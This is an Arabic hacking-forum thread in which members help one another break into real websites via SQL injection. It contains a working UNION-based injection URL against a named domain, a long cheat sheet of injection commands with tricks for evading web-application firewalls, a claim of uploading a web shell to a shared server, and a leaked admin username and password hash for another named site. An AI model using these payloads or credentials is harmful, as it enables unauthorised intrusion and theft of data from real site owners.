![]() |
مطلوووووب للاهميه عبد الصمد او اي شخص محترف ... سلام عليكم ورحمه الله اخواني انا واعوذ بالله من كلمه انا اخترقت 350 موقع بـ الـ sql يعني ولحمد لله متمكن من هاذي الثغره لااكن واجهتني مشكله فـ الاونه الاخيره وهيا مثل هاذا الموقع ... كود PHP: كود PHP: فـ اتمنى طريقة حل هاذي المشكله وطرح الطريقه لتعم الفائده الرجاء اي شخص يمر ع الموضوع يشارك ولو بظم صوته الى صوتي .., احترامي , |
رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ... كود: http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29-- |
رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ... اقتباس:
هاذا الي اعرفه عن الثغره هاذي لااني متعامل معها كثير اما الموقع هاذا مصاب بـ SQL injection جربت بكل الطرق مافي امل :( ننتظر الخبراء , |
رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ... شوف بنسة للموقع الاول هذا طريقة تحطي الفلتر لانها مرتبه للامانه منقول منتدي أخر الكاتب محمد المطيري 03-02-2012, 08:10 PM وجبت الاومر المطلوبه جربه كله جميع أوامر SqL Injection أوامر تخطي Forbidden 403 أوامر تخطي Not Acceptable أوامر التـشفــيــر أثناء الحقن أوامر تخطي عدم ظهور عدد الأعمدة ============================== أوامر SqL Injection ============================== أمر استخراج عدد الأعمدة ============================== +order+by+ ============================== أمر استخراج العامود المصاب ============================== +union+select+ ============================== أمر استخراج اسم قاعدة البيانات ============================== Database() ============================== أمر استخراج اصدار قاعدة البيانات ============================== Version() ============================== أمر استخراج يوزر قاعدة البيانات User() ============================== أمر استخراج الجداول ============================== يوضع هذا الأمر مكان العامود المصاب ============================== group_concat(table_name) ============================== ويوضع هذا الأمر في نهاية الرابط ============================== +from+information_schema.tables+where+table_schema =database()-- ============================== أمر استخراج الأعمدة ============================== يوضع هذا الأمر مكان العامود المصاب ============================== group_concat(column_name) ============================== ويوضع هذا الأمر في نهاية الرابط ============================== +from+information_schema.columns+where+table_schem a=database()-- ============================== أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة ============================== تخطي Forbidden 403 اثناء استخراج العامود المصاب ============================== اضافة الفلتر ============================== /*! */ ============================== على كلمة ============================== select ============================== لتصبح بهذا الشكل ============================== /*!select*/ ============================== واذا لم تنجح الطريقة العب بكلمة ============================== select ============================== لتصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== احرف سمول وأحرف كابتل ============================== تخطي Forbidden 403 اثناء استخراج الجداول ============================== التعديل بالأمر ============================== select ============================== ليصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== التعديل بالأمر ============================== group_concat(table_name) ============================== ليصبح بهذا الشكل ============================== /*!GrOuP_CoNcAT(table_name)*/ ============================== وتعديل الامر ============================== ليصبح بهذا الشكل ============================== +from+information_schema.tables+where+table_schema =database()-- ============================== تخطي Forbidden 403 اثناء استخراج الجداول ============================== التعديل بالأمر ============================== select ============================== ليصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== التعديل بالأمر ============================== group_concat(column_name) ============================== ليصبح بهذا الشكل ============================== /*!GrOuP_CoNcAT(column_name)*/ ============================== وتعديل الامر ============================== ليصبح بهذا الشكل ============================== +from+information_schema.columns+where+table_schem a=database()-- ============================== ليصبح بهذا الشكل ============================== + ============================== from+information_schema./*!columns*/+where+table_schema=database()-- ============================== أوامر تخطي Not Acceptable ============================== تخطي Not Acceptable اثناء استخراج العامود المصاب ============================== اضافة الفلتر ============================== /*! */ ============================== على كلمة ============================== select ============================== لتصبح بهذا الشكل ============================== /*!select*/ ============================== واذا لم تنجح الطريقة العب بكلمة ============================== select ============================== لتصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== احرف سمول وأحرف كابتل ============================== تخطي Not Acceptable اثناء استخراج الجداول ============================== التعديل بالأمر ============================== select ============================== ليصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== التعديل بالأمر ============================== group_concat(table_name) ============================== ليصبح بالشكل دا ============================== /*!GrOuP_CoNcAT(table_name)*/ ============================== تخطي Not Acceptable اثناء استخراج الجداول ============================== التعديل بالأمر ============================== select ============================== ليصبح بهذا الشكل ============================== /*!SeLeCt*/ ============================== التعديل بالأمر ============================== group_concat(column_name) ============================== ليصبح بالشكل دا ============================== /*!GrOuP_CoNcAT(column_name)*/ ============================== أوامر تخطي الحماية من بعض الأوامر ============================== هذا الأمر نضعه مكان العامود المصاب ============================== concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema)))) ============================== وهذا الأمر نضعه في نهاية الرابط ============================== +from+information_schema.columns-- ============================== أوامر تخطي عدم ظهور عدد الأعمدة ============================== نقوم باضافة ============================== +--+ ============================== في نهاية الرابط ============================== واضافة العلامة التي بين قوسين ============================== (') ============================== بعد ============================== .php?id=1 ============================== ليصبح بهذا الشكل ============================== .php?id=1' ============================== الموقع الثاني مثل ماقال اخي blind SQL تسمى الحقن الاعمى هذا الدورة http://www.vbspiders.com/vb/f431.html تري اساسيات ولزم تتعمق فيها هذا قاعدة البيانات في الموقع الثاني[*] acosta_centro[*] information_schema موفق |
رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ... يعطيك العافيه اخوي خالد بس جربت كل الطرق مافي امل ننتظر عبد الصمد < الامل الوحيد |
رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ... اخي العزيز لو بدك تخترق السرفر أحقن أي موقع أخر على السرفر على العموم أنا حقنت مةقع أخر و رفعت الشل و راح أبعثهالك الأن على الخاص و السرفر حمايته قوية جداااااااااااااا |
رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ... اقتباس:
انا ماني مستهدف ولا شي انا بس احاول اتخطى فلتره الموقع هاذا لاان كثرت المواقع الي فيها نفس المشكله فـ انا ابحث عن الحل لتعم الفائده .., ننتظر الحل , |
رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ... اقتباس:
http://hotelacostacentro.com/noticia.php?id=-11 user admin password 5e7cf5d0c1214aacb755776e9f6a9449 hint table_name) of information_schema.tables where table_schema=0x61636F7374615F63656E74726F MySQL >=5 Column Count is 12 Column is 4 DB: acosta_centro inject type mssql راجع دروس الاخ عبد الصمد |
رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ... اقتباس:
اخي الكريم لو سمحت الحجقنه النهائيه ويارت لو تدلني ع الدرس الطلوب مني متابعته لاان دروس عبد الصمد ماشاء الله كثيره , احترامي , |
الساعة الآن 09:19 AM |
[ vBspiders.Com Network ]